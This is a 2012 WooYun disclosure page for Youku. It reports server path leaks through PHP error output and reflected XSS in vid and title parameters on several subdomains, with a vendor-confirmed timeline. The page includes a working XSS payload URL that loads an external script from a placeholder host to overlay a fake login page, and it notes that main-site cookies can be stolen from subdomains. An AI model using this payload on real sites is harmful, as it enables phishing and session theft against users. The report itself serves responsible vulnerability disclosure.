当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04283

漏洞标题:优酷配置不当导致路径泄漏

相关厂商:优酷

漏洞作者: Ambulong

提交时间:2012-02-07 01:21

修复时间:2012-03-23 01:22

公开时间:2012-03-23 01:22

漏洞类型:敏感信息泄露

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-02-07: 细节已通知厂商并且等待厂商处理中
2012-02-07: 厂商已经确认,细节仅向厂商公开
2012-02-17: 细节向核心白帽子及相关领域专家公开
2012-02-27: 细节向普通白帽子公开
2012-03-08: 细节向实习白帽子公开
2012-03-23: 细节向公众公开

简要描述:

优酷两处配置不当导致路径泄漏和XSS

详细说明:

优酷两处配置不当导致路径泄漏和多处XSS(至少20处)
XSS主要是由于vid参数未处理,有很多网页都用vid参数调用视频链接。
别小看XSS
配置不当:
http://realplayer.youku.com/list.php?cls=104
http://realplayer.youku.com/detail.php?id=error

Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 34
Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 59
...


Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12
Warning: simplexml_load_file(http://api.youku.com/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12


XSS:都为vid参数或title参数存在XSS
http://sww.youku.com/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87
http://minisite.youku.com/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy
...
优酷的COOKIE的DOMAIN为.youku,com,因此可在分站直接获取主站的COOKIE,还可用于跳转与钓鱼
钓鱼:
http://minisite.youku.com/audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy%3C/script%3E%3Cscript%20src=http://127.0.0.1/webpage.js%20type=text/javascript%3Ediaoyu();/*
由函数diaoyu()调取伪造的登录界面并覆盖整个原先的界面(CSS设置下就可以)

漏洞证明:

http://realplayer.youku.com/list.php?cls=104#路径
http://realplayer.youku.com/detail.php?id=error#路径
http://sww.youku.com/player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87#XSS
http://minisite.youku.com/audi-ade/play.php?vid=XMjgwMDk1MjEy&type=tt#XSS

Warning: Invalid argument supplied for foreach() in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 34
Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/list.php on line 59
...


Warning: simplexml_load_file() [function.simplexml-load-file]: php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12
Warning: simplexml_load_file(http://api.youku.com/api_ptvideoinfo?pid=XMTI3Ng==&id=error) [function.simplexml-load-file]: failed to open stream: Connection timed out in /real/WebSite/htdocs/guide.cn.real.com/newsite/youku/detail.php on line 12




钓鱼:

修复方案:

更改配置或代码,对相关参数进行处理

版权声明:转载请注明来源 Ambulong@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2012-02-07 08:53

厂商回复:

已经在处理中

最新状态:

暂无

漏洞评价:

评论